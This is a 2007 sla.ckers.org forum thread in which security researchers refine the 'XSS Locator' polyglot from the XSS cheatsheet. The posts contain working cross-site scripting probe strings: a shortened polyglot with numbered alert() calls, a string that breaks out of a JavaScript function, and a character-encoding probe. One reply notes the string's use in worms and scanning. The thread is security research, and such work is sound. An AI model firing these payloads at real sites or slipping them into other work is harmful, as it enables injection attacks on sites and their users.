Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: Anonymous User
Date: March 20, 2007 06:52AM

Hi!

I would like to propose an optimization of the XSS locator on the XSS cheatsheet and the XML files:

If you transform this...
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>


... into this...
';alert(1)//\';alert(2)//";alert(3)//\";alert(4)//--></SCRIPT>">'><SCRIPT>alert(5)</SCRIPT>;=&{<script>alert(6)</script>}

... it is a) much shorter and b) you know where the injection came through.

Greetings,
.mario

Options: ReplyQuote
Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: rsnake
Date: March 20, 2007 03:59PM

I like it, but if I have more space, I'd want to use it again :) Hahah... Ah, the perils of having so many different types of issues!

For instance, the first section might work, but it might be inside of a function that you need to close out:

function bob() {
do_stuff("your text goes here");
}

To get around that you'd need something like:

");}alert(1)function xss(){//

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: Anonymous User
Date: March 21, 2007 03:50AM

Yes - I guess it's not even close to possible to cover all variants in one string but developers tend to make the same mistakes ever and ever again (including me).

The other day I thought about a vector which shows what characters you could get i to the site to render html - like:

<s>111</s>&lt;s&gt;222&lt/s&gt;%3cs%3e111%3c/s%3e%3c%73%3e%31%31%31%3c%2f%73%3e....
(... and so on)

Greetings,
.mario

Options: ReplyQuote
Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: hackathology
Date: March 27, 2007 01:15AM

Nice one mario....i am to format my own string.

http://hackathology.blogspot.com

Options: ReplyQuote
Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: Anonymous User
Date: March 27, 2007 10:00AM

Thx hackathology - don't hesitate to post when done ;)

Options: ReplyQuote
Re: Enhanced XSS Locator for the XSS cheatsheet (?)
Posted by: rsnake
Date: March 29, 2007 09:26PM

Yah, agreed... I am always interested in new variants of the XSS Locator. Not because I used it (never do) but because it's an interesting case study on single vector with mass exploitation potential (particularly useful in worms and scanning).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.